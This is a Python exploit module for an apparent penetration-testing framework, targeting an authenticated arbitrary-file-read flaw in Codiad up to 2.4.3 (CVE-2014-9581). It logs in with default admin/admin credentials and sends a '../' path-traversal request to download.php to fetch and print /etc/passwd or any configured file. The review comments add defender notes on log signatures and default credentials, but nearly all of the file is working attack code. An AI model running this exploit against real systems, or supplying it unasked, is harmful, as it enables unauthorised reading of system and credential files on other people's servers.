#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

try:
    from core.log import Log
    from core.log import color
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log
    from Log import color


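class Exploit:
    '''
    Module for the authenticated file-read issue in Codiad
    (CVE-2014-9581, per show_info()).

    Flow, as implemented below: POST the configured credentials to
    /components/user/controller.php?action=authenticate, then GET
    /components/filemanager/download.php with a `path` parameter made of
    "../" sequences followed by the configured absolute file path.

    Notes for reviewers and defenders:
      * The issue needs a valid login; the defaults here are admin/admin,
        so default credentials left in place are part of the exposure.
      * In web-server access logs the activity shows up as a POST to the
        authenticate endpoint followed by a GET to download.php whose
        `path` value contains "../".
      * All requests use plain http://, so the credentials cross the
        network in cleartext.
      * show_info() lists versions <= 2.4.3 as affected; which release
        carries the fix is not stated in this file.
    '''

    # Configuration for this module.
    # Notes:
    #   necessity - whether the option must be configured
    #   default   - the option's default (and current) value
    #
    # NOTE(review): `config` and `session` are class attributes, so every
    # instance shares them and set_config() changes the value for all of
    # them. Left as-is because the loading framework may rely on it.
    config = {
        "remote_host": {"default": "127.0.0.1", "necessity": True},
        "remote_port": {"default": 80, "necessity": True},
        "admin_user": {"default": "admin", "necessity": True},
        "admin_pwd": {"default": "admin", "necessity": True},
        "file": {"default": "/etc/passwd", "necessity": True},
        "interactive": {"default": True, "necessity": True}
    }
    session = requests.Session()

    # Seconds to wait for the server; without a timeout `requests` can
    # block indefinitely on an unresponsive host.
    REQUEST_TIMEOUT = 10

    def __init__(self):
        pass

    def _base_url(self):
        '''
        Build "http://host:port" from the current configuration.

        The port is passed through int() because set_config() stores
        whatever value it is given, which may be a string.
        '''
        return "http://%s:%d" % (
            self.get_config("remote_host"),
            int(self.get_config("remote_port")))

    def login(self):
        '''
        Authenticate the shared session with the configured credentials.

        Returns True when the response body contains the marker
        'status":"success"', otherwise False. A transport error is
        logged and reported as False.
        '''
        url = self._base_url() + "/components/user/controller.php?action=authenticate"
        data = {
            "username": self.get_config("admin_user"),
            "password": self.get_config("admin_pwd"),
            "theme": "default",
            "language": "en"
        }
        try:
            response = self.session.post(
                url, data=data, timeout=self.REQUEST_TIMEOUT)
        except requests.RequestException as e:
            Log.Log.error(str(e))
            return False
        content = response.content
        print("[+] Login Content : %s" % (content))
        # Compare against the decoded text: response.content is bytes on
        # Python 3, where a str-in-bytes membership test raises TypeError.
        return 'status":"success"' in response.text

    def exploit(self):
        '''
        Core routine: log in, request the configured file and print it.

        Returns True when the download request answers HTTP 200, False
        on a failed login, any other status code, or an exception.
        '''
        target_path = self.get_config("file")
        if not self.login():
            Log.Log.error("Login failed!")
            return False
        Log.Log.success("Login successful!")
        # Uses _base_url() so the port gets the same int() conversion as in
        # login(); formatting a string port with %d raised TypeError here.
        url = "%s/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (
            self._base_url(), target_path)
        try:
            response = self.session.get(url, timeout=self.REQUEST_TIMEOUT)
            if response.status_code != 200:
                Log.Log.error("Unexpected HTTP status: %d" % response.status_code)
                return False
            # NOTE(review): HTTP 200 alone is treated as success and the
            # body is not validated. A server that answers 200 with an
            # error page would be reported as vulnerable, so check the
            # printed content before recording a finding.
            Log.Log.success("Exploit success!")
            Log.Log.info(">>>>>> %s <<<<<<" % (target_path))
            # NOTE(review): response.content is bytes on Python 3; how
            # color.blue() handles bytes is not visible here - confirm.
            print("%s" % color.blue(response.content))
            return True
        except Exception as e:
            Log.Log.error(str(e))
            return False

    def show_options(self):
        '''
        Print this module's options (the `config` defined above).
        Triggered by the `options` command.
        Usually does not need to be changed.
        '''
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        for key in sorted(self.config):
            Log.Log.warning("%s\t\t%s\t\t\t%s" % (
                key, self.config[key]["necessity"], self.get_config(key)))

    def set_config(self, key, value):
        '''
        Change the value of an existing option.
        Triggered by the `set` command.
        Usually does not need to be changed.

        The value is stored as given, without type conversion; an unknown
        key is reported through the error log and nothing is stored.
        '''
        if key in self.config:
            self.config[key]["default"] = value
        else:
            Log.Log.error("No such option!")

    def get_config(self, key):
        '''
        Return the current value of option `key` (KeyError if unknown).
        '''
        return self.config[key]["default"]

    def show_info(self):
        '''
        Detailed information about the module (vulnerability): name,
        affected versions, author, reference links and so on.
        Called automatically when the module is loaded.
        The entries must be edited to match the module.
        '''
        Log.Log.info("Name: Codiad (2.4.3) Any file read (CVE-2014-9581)")
        Log.Log.info("Effected Version: <=2.4.3")
        Log.Log.info("Author: TaurusOmar")
        Log.Log.info("Email: taurusomar13@gmail.com")
        Log.Log.info("Twitter: @TaurusOmar_")
        Log.Log.info("Home: overhat.blogspot.com")
        Log.Log.info("Refer:")
        Log.Log.info("\thttps://www.exploit-db.com/exploits/35585/")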

def main():
    '''
    Test case: load the module, print its metadata and options, then run
    it once against "localhost" with every other option left at its
    default value.
    '''
    module = Exploit()
    module.show_info()
    module.set_config("remote_host", "localhost")
    module.show_options()
    module.exploit()

# Run the test case only when the file is executed directly, not when the
# module is imported.
if __name__ == "__main__":
    main()
